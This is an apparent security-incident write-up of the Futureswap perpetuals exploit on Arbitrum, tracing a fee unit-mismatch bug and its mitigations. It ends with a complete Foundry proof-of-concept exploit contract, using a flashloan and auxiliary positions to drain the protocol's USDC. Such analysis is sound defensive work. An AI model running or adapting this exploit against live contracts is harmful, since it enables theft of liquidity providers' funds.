Futureswap

Total Losses

$395.0K+

Date

January 10, 2025

Network

arbitrum

Step-by-step Overview

Futureswap, a perpetual futures protocol on Arbitrum utilizing Uniswap V3 for liquidity suffered a ~$394K exploit due to a unit mismatch bug in fee calculation. The root cause was that feeAmount (expressed in token units) was passed directly to addFee function as if it were basis points, allowing attackers to register inflated fee shares and drain protocol funds during position settlement.

The Futureswap exploit unfolded in three phases, exploiting a unit conversion error:

Flashloan Funding:
- The attacker flashloaned 500,000 USDC.e from Aave V3 to fund and scale the attack
- Deployed three auxiliary contracts to open multiple leveraged positions
- Each auxiliary contract was configured with specific position parameters that was calculated off-chain
Position Manipulation (Fee Poisoning):
- Opened multiple LONG positions via auxiliary contracts (0.1 ETH, ~0.3246 ETH, 0.001 ETH)
- Each changePosition() call triggered Uniswap V3 swaps via the protocol
- The swap callback computed feeAmount in token units but passed it to addFee() as basis points
- Example: feeAmount ≈ 501,676 (token units) became 501,676 bps = 5,016.76% fee share
- Opened a SHORT position (-68 ETH with 496,500 USDC collateral) to maximize fee accumulation
Profit Extraction:
- Closed the first auxiliary position, triggering settlement with the poisoned fee state
- The inflated fee shares caused the protocol to overpay the attacker during distribution
- Withdrew ~894,992 USDC.e from the closed position
- Repaid the 500,000 USDC.e flashloan plus premium
- Net profit: ~394,742 USDC.e forwarded to attacker EOA

Detailed Description

How Futureswap Works

Futureswap V4 is a decentralized leveraged trading protocol on Arbitrum that operates fundamentally as a lending protocol. Liquidity providers (LPs) deposit funds into internal reserves, which traders borrow to create leveraged positions using Uniswap V3 as the underlying swap mechanism.

Opening a LONG position:

Trader deposits collateral (e.g., 100 USDC for 10x leverage on ETH)
Protocol borrows additional USDC from LP reserves (900 USDC in this case)
Total amount (1,000 USDC) is swapped for ETH on Uniswap V3
The borrowed amount becomes the trader’s debt; the ETH becomes their equity

Opening a SHORT position:

Trader deposits collateral
Protocol borrows ETH from reserves
ETH is sold on Uniswap V3 for USDC
The borrowed ETH becomes debt; the USDC becomes equity

The protocol charges a 0.05% trade fee plus the 0.05% Uniswap V3 pool fee, totaling approximately 0.1% (~10 basis points) per trade.

The Core Vulnerability: Unit Mismatch in Fee Calculation

When a user calls changePosition(), Futureswap executes swaps on Uniswap V3 to adjust the position. The uniswapV3SwapCallback() receives the fee amount from Uniswap:

// Inside uniswapV3SwapCallback after swap execution
// feeAmount is returned in TOKEN UNITS (e.g., 501,676 for ~0.5 USDC)

// BUGGY CODE:
feeBasisPoints = feeAmount;  // Direct assignment without conversion!
feeManager.addFee(receiver, feeBasisPoints);  // Interpreted as basis points

The issue: feeAmount from Uniswap is in absolute token units (e.g., 501,676 = 0.501676 USDC for a 6-decimal token), but addFee() expects basis points where 10,000 bps = 100%.

Attack Execution Flow

The PoC demonstrates the attack sequence:

// Step 1: Flashloan 500,000 USDC from Aave
AAVE_POOL.flashLoanSimple(address(this), address(USDC), 500_000_000_000, "", 0);

// Step 2: Open multiple LONG positions via auxiliary contracts
// Each changePosition() poisons the fee state
USDC.transfer(address(aux_01), 1_000_000_000);  // 1,000 USDC
aux_01.execute();  // Opens LONG 0.1 ETH

USDC.transfer(address(aux_02), 2_000_000_000);  // 2,000 USDC
aux_02.execute();  // Opens LONG ~0.3246 ETH

USDC.transfer(address(aux_03), 500_000_000);   // 500 USDC
aux_03.execute();  // Opens LONG 0.001 ETH

// Step 3: Open massive SHORT to maximize fee manipulation
FUTURESWAP.changePosition(
    -68 ether,           // SHORT 68 ETH
    int256(496_500_000_000),  // 496,500 USDC collateral
    0
);

// Step 4: Close position and extract profit via poisoned fees
aux_01.closePosition(0, -894_992_852_305, 0);  // Withdraws ~894,992 USDC

// Step 5: Repay flashloan, profit ~394,742 USDC

Why Multiple Positions?

The attacker used multiple auxiliary contracts for several reasons:

Fee Accumulation: Each position change accumulated more fee entries
Position Isolation: Separate contracts allowed selective closing without affecting other positions
Direction Mixing: Long and short positions created complex settlement calculations that amplified the fee distribution bug
Pool State Manipulation: The long positions shift pool reserves, enabling the large 68 ETH short to pass PBL validation

Attack Parameters Analysis

The hardcoded values in the PoC appear to be optimized for maximum extraction within protocol constraints.

Protocol State at Block 419829770 (One Block Before Attack)

Metric	Value
ETH Price (Chainlink)	$3,085.34
Futureswap WETH	99.85 ETH
Futureswap USDC	197,436.75 USDC
Aave Available USDC	~546,596 USDC

Flashloan Availability

Aave V3 on Arbitrum had ~546K USDC available at this block. The 500K flashloan provides a ~46K buffer below the maximum available liquidity. However, increasing the flashloan amount would not increase profit since the constraint is on position size rather than available collateral.

Maximum Short Position (68 ETH)

Testing on a fork reveals a boundary at 68 ETH:

Short Size	Collateral	Result
68 ETH	496,500 USDC	Passes
69 ETH	496,500 USDC	PBL (Position Below Liquidation)
69 ETH	499,000 USDC	PBL
70 ETH	541,500 USDC	PBL

Even with more collateral, positions exceeding 68 ETH fail PBL validation. This suggests the protocol enforces a maximum position size relative to pool liquidity, independent of margin ratio.

Close Amount Calculation

The withdrawal amount -894,992,852,305 represents the USDC balance remaining in the Futureswap contract after all positions are opened. This value drains the pool’s USDC reserves to zero.

Profit Source: Initial Reserves + Swap Proceeds

While Futureswap initially held only ~197K USDC, the total extractable amount reached ~895K USDC because opening a 68 ETH short requires the protocol to sell ETH on Uniswap V3:

Source	Amount
Initial Futureswap USDC	~197,437 USDC
Deposited collateral (all positions)	500,000 USDC
USDC received from selling 68 ETH	~197,556 USDC
Total pool USDC after positions	~894,993 USDC

The ~395K profit equals the extracted amount minus the flashloan repayment (~500K + premium). The 68 ETH represents the maximum extractable position: 67 ETH would leave approximately 42K USDC unextracted, while 69 ETH fails protocol validation.

Conclusions

The Futureswap exploit demonstrates how a unit mismatch bug can lead to the draining of protocol funds, ~$395K from LP reserves. This issue would have been caught by unit testing, since executing the fee flow with a non-zero fee amount reveals a fee percentage orders of magnitude higher than expected.

Possible Mitigations

A basic unit test exercising the changePosition() flow with non-zero fee values would have surfaced the issue. In addition to unit testing, adopting fuzz testing would reduce the likelihood of similar bugs. Separately, the following mitigations would have prevented this exploit:

1. Explicit Unit Conversion

Normalize Fees: Convert token unit fees to basis points using the actual trade size as denominator. This ensures fees are always expressed as a percentage of the trade, capped at reasonable values.

2. Input Validation and Sanity Checks

Cap Fee Values: Enforce maximum bounds on fee percentages. Futureswap’s documented fee is 0.05% (~5 bps) plus Uniswap’s 0.05% (~5 bps). Any fee value exceeding ~100 bps (1%) should trigger a revert as it would indicate an error or manipulation.
Validate Fee Pool: Before distribution, verify that total claimed fees don’t exceed actual collected fees.

Sources and References

futureswap.attack.sol

solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import {Test, console} from "forge-std/Test.sol";
import {TokenBalanceTracker} from "../../modules/TokenBalanceTracker.sol";
import {IERC20} from "../../interfaces/IERC20.sol";
import {IPool, IFlashLoanSimpleReceiver, IFutureswap} from "./interfaces.sol";

// ============================================
// AUXILIARY CONTRACT (reusable for all positions)
// ============================================

contract AuxiliaryPosition {
    IERC20 private constant USDC = IERC20(0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8);
    IFutureswap private constant FUTURESWAP = IFutureswap(0xF7CA7384cc6619866749955065f17beDD3ED80bC);

    int256 public immutable deltaAsset;
    int256 public immutable deltaStable;
    int256 public immutable stableBound;

    constructor(int256 _deltaAsset, int256 _deltaStable, int256 _stableBound) {
        deltaAsset = _deltaAsset;
        deltaStable = _deltaStable;
        stableBound = _stableBound;
    }

    function execute() external {
        FUTURESWAP.longPosition();

        uint256 stableAmount = uint256(deltaStable);
        require(USDC.balanceOf(address(this)) == stableAmount, "balance mismatch");
        USDC.approve(address(FUTURESWAP), stableAmount);

        FUTURESWAP.changePosition(deltaAsset, deltaStable, stableBound);
    }

    function closePosition(int256 _deltaAsset, int256 _deltaStable, int256 _stableBound) external {
        FUTURESWAP.changePosition(_deltaAsset, _deltaStable, _stableBound);

        uint256 balance = USDC.balanceOf(address(this));
        USDC.transfer(msg.sender, balance);
    }
}

// ============================================
// MAIN EXPLOIT CONTRACT
// ============================================

contract Exploit_Futureswap is Test, TokenBalanceTracker, IFlashLoanSimpleReceiver {

    address constant ATTACKER = 0xbF6EC059F519B668a309e1b6eCb9a8eA62832d95;

    // Block number for fork (one block before the attack)
    uint256 constant ATTACK_BLOCK = 419829770;
                                    
    // Token addresses
    IERC20 private constant WETH = IERC20(0x82aF49447D8a07e3bd95BD0d56f35241523fBab1);
    IERC20 private constant USDC = IERC20(0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8);

    // Futureswap contract
    IFutureswap private constant FUTURESWAP = IFutureswap(0xF7CA7384cc6619866749955065f17beDD3ED80bC);

    // Aave V3 Pool on Arbitrum
    IPool private constant AAVE_POOL = IPool(0x794a61358D6845594F94dc1DB02A252b5b4814aD);

    // USDC amounts (6 decimals)
    uint256 constant USDC_1000 = 1_000_000_000;      // 1,000 USDC
    uint256 constant USDC_2000 = 2_000_000_000;      // 2,000 USDC
    uint256 constant USDC_500 = 500_000_000;         // 500 USDC
    uint256 constant USDC_496500 = 496_500_000_000;  // 496,500 USDC
    uint256 constant FLASHLOAN_AMOUNT = 500_000_000_000; // 500,000 USDC

    uint16 constant REFERRAL_CODE = 0;

    // Auxiliary contract instances (replicating attacker's deployed contracts)
    // 0xf1b426708D6ECf02274A789Bbc10A94a1B5A6635: Opens LONG 0.1 ETH with 1,000 USDC collateral
    AuxiliaryPosition public aux_01;
    // 0x8c6be2E20306dD1eC40A7E76f40310943953bA7f: Opens LONG ~0.3246 ETH with 2,000 USDC collateral
    AuxiliaryPosition public aux_02;
    // 0xEa09EA354009818776D41F8E2a9DCDfC9C4e7bEb: Opens LONG 0.001 ETH with 500 USDC collateral
    AuxiliaryPosition public aux_03;

    function setUp() public {
        vm.createSelectFork(vm.envString("RPC_URL"), ATTACK_BLOCK);

        deal(ATTACKER, 0);

        addTokenToTracker(address(WETH));
        addTokenToTracker(address(USDC));

        updateBalanceTracker(ATTACKER);
        updateBalanceTracker(address(FUTURESWAP));
    }

    function test_attack() public {
        console.log("======= FUTURESWAP EXPLOIT =======\n");
        console.log("------- INITIAL BALANCES -------");
        logBalancesWithLabel("Attacker", ATTACKER);
        logBalancesWithLabel("Futureswap", address(FUTURESWAP));

        // Deploy auxiliary contracts (replicating attacker's strategy)
        // 0xf1b426708D6ECf02274A789Bbc10A94a1B5A6635: LONG 0.1 ETH, 1,000 USDC
        aux_01 = new AuxiliaryPosition(0.1 ether, int256(USDC_1000), 0);
        // 0x8c6be2E20306dD1eC40A7E76f40310943953bA7f: LONG ~0.3246 ETH, 2,000 USDC
        aux_02 = new AuxiliaryPosition(324_678_582_642_240_534, int256(USDC_2000), 0);
        // 0xEa09EA354009818776D41F8E2a9DCDfC9C4e7bEb: LONG 0.001 ETH, 500 USDC
        aux_03 = new AuxiliaryPosition(0.001 ether, int256(USDC_500), 0);

        // Run the attack (test contract acts as attacker, profits sent to ATTACKER)
        run();

        console.log("\n------- FINAL BALANCES -------");
        logBalancesWithLabel("Attacker", ATTACKER);
        logBalancesWithLabel("Futureswap", address(FUTURESWAP));
    }

    function run() public {

        console.log("[1] Requesting flashloan: 500,000 USDC");

        AAVE_POOL.flashLoanSimple(
            address(this),
            address(USDC),
            FLASHLOAN_AMOUNT,
            "",
            REFERRAL_CODE
        );
    }

    // Callback function called by Aave after receiving the flashloan
    function executeOperation(
        address /* asset */,
        uint256 amount,
        uint256 premium,
        address initiator,
        bytes calldata /* params */
    ) external override returns (bool) {
        require(msg.sender == address(AAVE_POOL), "Caller is not Aave Pool");
        require(initiator == address(this), "Initiator is not this contract");

        // ============================================
        // EXPLOIT LOGIC
        // ============================================

        // Step 1: Update funding rates
        console.log("[2] Calling updateFunding on Futureswap");
        FUTURESWAP.updateFunding();

        // Step 2: Fund aux_01 and open LONG position (0.1 ETH)
        console.log("[3] aux_01: Transfer 1,000 USDC, open LONG 0.1 ETH");
        USDC.transfer(address(aux_01), USDC_1000);
        aux_01.execute();

        // Step 3: Fund aux_02 and open LONG position (~0.3246 ETH)
        console.log("[4] aux_02: Transfer  2,000 USDC, open LONG ~0.3246 ETH");
        USDC.transfer(address(aux_02), USDC_2000);
        aux_02.execute();

        // Step 4: Fund aux_03 and open LONG position (0.001 ETH)
        console.log("[5] aux_03: Transfer 500 USDC, open LONG 0.001 ETH");
        USDC.transfer(address(aux_03), USDC_500);
        aux_03.execute();

        // Step 5: Open SHORT position (-68 ETH) to manipulate price
        console.log("[6] Main contract: Open SHORT -68 ETH with 496,500 USDC collateral");
        USDC.approve(address(FUTURESWAP), USDC_496500);
        FUTURESWAP.changePosition(
            -68 ether,           // deltaAsset = -68 ETH (short)
            int256(USDC_496500), // deltaStable = +496,500 USDC
            0                    // stableBound
        );

        // Step 6: aux_01 closes position and withdraws profit
        console.log("[7] aux_01: Close position, withdraw ~894,992 USDC profit");
        aux_01.closePosition(0, -894_992_852_305, 0);

        // Step 7: Repay flashloan
        uint256 amountOwed = amount + premium;
        console.log("[8] Repaying flashloan");
        USDC.approve(address(AAVE_POOL), amountOwed);

        // After repayment, transfer remaining USDC to attacker
        uint256 remainingAfterRepay = USDC.balanceOf(address(this)) - amountOwed;
        USDC.transfer(ATTACKER, remainingAfterRepay);

        return true;
    }
}

interfaces.sol